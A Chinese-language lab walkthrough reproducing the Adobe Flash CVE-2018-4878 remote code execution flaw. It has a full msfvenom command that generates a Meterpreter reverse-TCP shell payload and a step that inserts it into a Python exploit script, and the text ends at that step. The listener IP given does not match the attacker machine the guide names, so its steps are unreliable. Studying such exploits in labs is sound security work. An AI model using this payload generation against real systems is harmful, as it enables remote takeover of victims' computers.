引言
1. 漏洞概述
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。
互联网上出现的基于此Flash 0day漏洞进行攻击的样本,其实在2017年底就已经由韩国计算机应急小组(KR-CERT)首次发现。
2. 相关知识介绍
2.1 exp介绍
EXP = Exploit的中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的方法。
2.2 metasploit介绍
它是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程,团队合作。
3. 利用复现过程
3.1 内网环境搭建
虚拟机环境:
1)外网:
攻击机: 系统:kali
IP:192.168.28.136
2)内网:
靶机1:系统: Windows7x64 存在cve-2018-4878漏洞
外IP:192.168.28.129 内IP 192.168.211.128
靶机2:系统: Windows Server 2003
IP:192.168.211.129
Flash环境:
靶机1(192.168.28.129 )安装Adobe Flash 28.0.0.137版本
3.2 复现过程
3.2.1 安装flash
3.2.2 使用msfvenom生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.211.129 lport=8888 -f python>shellcode.txt
(其中lhost为kali的ip地址,lport为自定义的端口号)
3.2.3 使用python编写利用程序 生成cve-2018-4878.py
cat shellcode.txt
并将buf覆盖为msfvenom生成的代码shellcode.txt